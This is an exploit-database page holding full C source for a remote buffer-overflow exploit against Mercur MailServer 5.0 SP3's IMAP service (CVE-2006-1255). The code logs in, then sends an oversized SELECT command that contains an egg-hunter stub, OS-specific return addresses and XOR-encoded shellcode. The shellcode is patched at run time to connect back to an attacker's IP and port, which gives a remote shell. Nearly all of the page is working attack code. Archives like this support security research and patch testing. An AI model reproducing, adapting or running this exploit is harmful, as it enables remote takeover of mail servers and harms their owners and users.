Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)

EDB-ID:

1592

CVE:

2006-1255

EDB Verified:

Author:

pLL

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2006-03-19

Vulnerable App: 
/*
 * mercur.cpp
 *
 * Atrium Mercur IMAP 5.0 SP3 Messaging Multiple IMAP Commands Remote Exploit
 * Copyright (C) 2006 Javaphile Group
 * http://www.javaphile.org
 *
 * Exploits code by : pll Ellison.Tang[at]gmail[dot]com
 *
 * Bug Reference:
 * http://www.frsirt.com/bulletins/4332
 *
 */

#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

SOCKET ConnectTo(char *ip, int port)
{
	WSADATA	wsaData;
	SOCKET	s;
	struct	hostent		*he;
	struct	sockaddr_in	host;
	int		nTimeout=150000;

	if(WSAStartup(MAKEWORD(1,1),&wsaData)!=0)
	{
		printf("[-]WSAStartup failed.\n");
		exit(-1);
	}

	if((he=gethostbyname(ip))==0)
	{
		printf("[-]Failed to resolve '%s'.", ip);
		exit(-1);
	}

	host.sin_port=htons(port);
	host.sin_family=AF_INET;
	host.sin_addr=*((struct in_addr *)he->h_addr);

	if ((s=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		printf("[-]Failed creating socket.");
 		exit(-1);
 	}

	if ((connect(s,(struct sockaddr *)&host,sizeof(host)))==-1)
	{
		closesocket(s);
		printf("[-]Failed connecting to host.\n");
		exit(-1);
	}
	setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char*)&nTimeout,sizeof(nTimeout));
	return s;
}


void Disconnect(SOCKET s)
{
	closesocket(s);
	WSACleanup();
}

void PrintSc(unsigned char *sc, int len)
{
    int    i,j;
    char *p;
    char msg[6];

    //printf("/* %d bytes */\n", buffsize);

    // Print general shellcode
    for(i = 0; i < len; i++)
    {
        if((i%16)==0)
        {
            if(i!=0)
                printf("\"\n\"");
            else
                printf("\"");
        }

        //printf("\\x%.2X", sc[i]);

        sprintf(msg, "\\x%.2X", sc[i] & 0xff);

        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                printf("%c", _tolower(*p));
            else
                printf("%c", p[0]);
        }
    }

    printf("\";\n");
}

void main(int argc,char* argv[])
{

	struct OSTYPE
	{
		unsigned int ret;
		char des[255];
	};

	OSTYPE os[] = {
		{0x7FFA4512, "CN Windows ALL 0x7FFA4512"},
		{0x7801f4fb, "Windows 2k SP4 0x7801f4fb"},
		{0xDDDDDDDD, "Debug"},
		{0, NULL}
	};

	unsigned char shellcode[]=
	/* ip offset: 71 + 21 = 92 */
	/* port offset: 78 + 21 = 99 */
	/* 21 bytes decode */
	"\xeb\x0e\x5b\x4b\x33\xc9\xb1\xfe\x80\x34\x0b\xee\xe2\xfa\xeb\x05"
	"\xe8\xed\xff\xff\xff"
	/* 254 bytes shellcode, xor with 0xee */
	"\x07\x36\xee\xee\xee\xb1\x8a\x4f\xde\xee\xee\xee\x65\xae\xe2\x65"
	"\x9e\xf2\x43\x65\x86\xe6\x65\x19\x84\xea\xb7\x06\x96\xee\xee\xee"
	"\x0c\x17\x86\xdd\xdc\xee\xee\x86\x99\x9d\xdc\xb1\xba\x11\xf8\x7b"
	"\x84\xed\xb7\x06\x8e\xee\xee\xee\x0c\x17\xbf\xbf\xbf\xbf\x84\xef"
	"\x84\xec\x11\xb8\xfe\x7d\x86"
	"\x91\xee\xee\xef"				//ip
	"\x86"
	"\xec\xee"
	"\xee\xdb"						//port
	"\x65\x02\x84\xfe\xbb\xbd\x11\xb8\xfa\x6b\x2e\x9b\xd6\x65\x12\x84"
	"\xfc\xb7\x45\x0c\x13\x88\x29\xaa\xca\xd2\xef\xef\x7d\x45\x45\x45"
	"\x65\x12\x86\x8d\x83\x8a\xee\x65\x02\xbe\x63\xa9\xfe\xb9\xbe\xbf"
	"\xbf\xbf\x84\xef\xbf\xbf\xbb\xbf\x11\xb8\xea\x84\x11\x11\xd9\x11"
	"\xb8\xe2\x11\xb8\xf6\x11\xb8\xe6\xbf\xb8\x65\x9b\xd2\x65\x9a\xc0"
	"\x96\xed\x1b\xb8\x65\x98\xce\xed\x1b\xdd\x27\xa7\xaf\x43\xed\x2b"
	"\xdd\x35\xe1\x50\xfe\xd4\x38\x9a\xe6\x2f\x25\xe3\xed\x34\xae\x05"
	"\x1f\xd5\xf1\x9b\x09\xb0\x65\xb0\xca\xed\x33\x88\x65\xe2\xa5\x65"
	"\xb0\xf2\xed\x33\x65\xea\x65\xed\x2b\x45\xb0\xb7\x2d\x06\xcd\x11"
	"\x11\x11\x60\xa0\xe0\x02\x9c\x10\x5d\xf8\x01\x20\x0e\x8e\x43\x37"
	"\xeb\x20\x37\xe7\x1b\x43\x02\x17\x44\x8e\x09\x97\x28\x97";

	unsigned char FindSc[]=
	"\x8B\xCC\x80\xE9\x3E\x8B\xF1\x33\xC0\x40\xC1\xE0\x0A\x04\x80\x8B"
	"\xF8\x57\x33\xC9\xB1\x3E\xF3\xA4\x5F\xFF\xE7\x8B\xC7\x04\x28\x50"
	"\x33\xC0\x50\x64\x89\x20\xBA\x41\x47\x4F\x55\x33\xFF\x3B\x17\x74"
	"\x03\x47\xEB\xF9\x83\xC7\x04\x3B\x17\x74\x03\x47\xEB\xEF\x83\xC7"
	"\x04\x57\xC3\x8B\x54\x24\x0C\x33\xC0\xB4\x10\x33\xDB\xB3\x9C\x01"
	"\x04\x13\x33\xC0\xC3"
	"\x90\x90\x90\x90"
	"\xEB\xA5";


	if(argc < 5)
	{
		printf("Mercur IMAPD 5.0 SP3 Remote Exploit\n");
		printf("-------------------------------------------\n");
		printf("Usage:\n");
		printf("   %s <Victim> <Connect back IP> <Connect back Port> <OsType>\n", argv[0]);
		printf("\nType could be:\n");

		int i=0;
		while(os[i].ret)
		{
			printf(" [%d]  %s\n", i, os[i].des);
			i++;
		}
		return;
	}

	SOCKET	s=ConnectTo(argv[1],143);

	printf("[+]Connected to target...");

	char szRecvBuff[600] = {0};

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "MERCUR") == NULL)
	{
		printf("[-]Seems not IMAP running.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems IMAP running.\n");
	}

	unsigned long dwCbIp=inet_addr(argv[2]);

	unsigned short q=(unsigned short)atoi(argv[3]);
	unsigned short dwCbPort=(unsigned short)q;

	dwCbIp=dwCbIp^0xEEEEEEEE;
	dwCbPort=dwCbPort^0xEEEE;

	shellcode[92] =(char) (dwCbIp & 0x000000FF);
	shellcode[93] =(char) ((dwCbIp & 0x0000FF00)>>8);
	shellcode[94] =(char) ((dwCbIp & 0x00FF0000)>>16);
	shellcode[95] =(char) ((dwCbIp & 0xFF000000)>>24);

	shellcode[99] =(char) ((dwCbPort & 0x0000FF00)>>8);
	shellcode[100] =(char) (dwCbPort & 0x000000FF);

	char	szUserName[20]={0};
	printf("[?]Username:");
	gets(szUserName);

	char	szPassWord[20]={0};
	printf("[?]Passwd:");
	gets(szPassWord);

	char	szLogin[]=" login ";
	char	szLoginInfo[50]={0};
	unsigned char	szSpace=0x20;
	char szEnd[]="\r\n";

	memcpy(szLoginInfo,szUserName,lstrlen(szUserName));
	int		dwLen=lstrlen(szUserName);
	memcpy(szLoginInfo+dwLen,szLogin,lstrlen(szLogin));
	dwLen+=lstrlen(szLogin);
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,&szSpace,1);
	dwLen++;
	memcpy(szLoginInfo+dwLen,szPassWord,lstrlen(szPassWord));
	dwLen+=lstrlen(szPassWord);
	memcpy(szLoginInfo+dwLen,szEnd,lstrlen(szEnd));

//	printf("%s\n",szLoginInfo);

	printf("[+]Sending Login Info...");

	send(s,szLoginInfo,lstrlen(szLoginInfo),0);

	if(recv(s,szRecvBuff,sizeof(szRecvBuff),0)<=0)
	{
		printf("failed!\n");
		return;
	}
	else
	{
		printf("done!\n");
	}

//	printf("%s\n",szRecvBuff);

	if(strstr(szRecvBuff, "OK") == NULL)
	{
		printf("[-]Seems not a valid user or not support IMAP.\n");
		printf("Quiting...");
		return;
	}
	else
	{
		printf("[*]Seems a valid user.\n");
	}

	char	szSelect[]=" select ";
	char	szMagicData[1000]={0};

	memset(szMagicData,'A',sizeof(szMagicData)-1);
	memcpy(szMagicData,szUserName,lstrlen(szUserName));
	memcpy(szMagicData+lstrlen(szUserName),szSelect,sizeof szSelect-1);

	int p=atoi(argv[4]);
	*(unsigned int *)&FindSc[85] = os[p].ret;

	memcpy(szMagicData+251-sizeof FindSc+1,FindSc,sizeof FindSc-1);

	memcpy(szMagicData+251,szEnd,sizeof szEnd-1);

	char	szAdog[]="AGOU";
	memcpy(szMagicData+253,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+257,szAdog,sizeof szAdog-1);
	memcpy(szMagicData+261,shellcode,sizeof shellcode-1);

	memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1);

	printf("[+]Sending Magic Data To server...Good Luck!\n");
	send(s,szMagicData,sizeof szMagicData-1,0);

	recv(s,szRecvBuff,sizeof(szRecvBuff),0);
	printf("%s\n",szRecvBuff);

	Disconnect(s);
	printf("[?]Sending finished...Good luck!\n");
}

// milw0rm.com [2006-03-19]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services